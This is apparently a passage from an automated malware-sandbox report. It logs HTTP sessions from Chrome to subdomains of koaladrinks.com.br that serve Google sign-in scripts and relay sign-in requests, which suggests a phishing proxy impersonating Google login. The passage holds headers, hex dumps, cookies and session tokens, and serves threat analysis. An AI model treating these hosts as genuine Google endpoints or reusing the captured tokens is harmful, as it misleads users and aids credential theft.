/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc; [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:51 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:51 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:51 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 32 0d 0a
                                                      Data Ascii: Age: 22932
                                                      2025-01-10 08:27:51 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:51 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:51 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:51 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:51 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:51 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:51 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:39 GMT
                                                      2025-01-10 08:27:51 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 33 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:39 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.949779139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:51 UTC1522OUTPOST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=112469&rt=c HTTP/1.1
                                                      Host: ijgbload.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 165
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                      X-Same-Domain: 1
                                                      x-goog-ext-391502476-jspb: ["S1847760580:1736497656249061",null,null,"AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ"]
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
                                                      2025-01-10 08:27:51 UTC165OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 55 45 6b 4b 77 62 25 32 32 25 32 43 25 32 32 25 35 42 25 35 43 25 32 32 53 31 38 34 37 37 36 30 35 38 30 25 33 41 31 37 33 36 34 39 37 36 35 36 32 34 39 30 36 31 25 35 43 25 32 32 25 35 44 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 25 32 32 67 65 6e 65 72 69 63 25 32 32 25 35 44 25 35 44 25 35 44 26 61 74 3d 41 49 6b 50 66 77 69 4f 59 50 74 2d 62 37 2d 70 76 4b 49 66 5a 51 75 79 33 6e 35 51 25 33 41 31 37 33 36 34 39 37 36 35 38 31 34 31 26
                                                      Data Ascii: f.req=%5B%5B%5B%22UEkKwb%22%2C%22%5B%5C%22S1847760580%3A1736497656249061%5C%22%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at=AIkPfwiOYPt-b7-pvKIfZQuy3n5Q%3A1736497658141&
                                                      2025-01-10 08:27:51 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:51 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:51 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:51 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:51 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:51 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:27:51 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:51 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:51 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:27:51 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:51 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.949781139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:51 UTC1183OUTGET /accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863 HTTP/1.1
                                                      Host: yt-sub.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: iframe
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:52 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:52 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:52 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:52 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:52 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:52 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=utf-8
                                                      2025-01-10 08:27:52 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin
                                                      2025-01-10 08:27:52 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:52 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 31 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:51 GMT
                                                      2025-01-10 08:27:52 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:52 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.949782139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:51 UTC1865OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;M [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:52 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:52 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:52 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 32 0d 0a
                                                      Data Ascii: Age: 22932
                                                      2025-01-10 08:27:52 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:52 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:52 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:52 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:52 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:52 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:52 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:40 GMT
                                                      2025-01-10 08:27:52 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:40 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.949783139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:52 UTC2351OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:X [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:53 UTC17INHTTP/1.1 200 OK
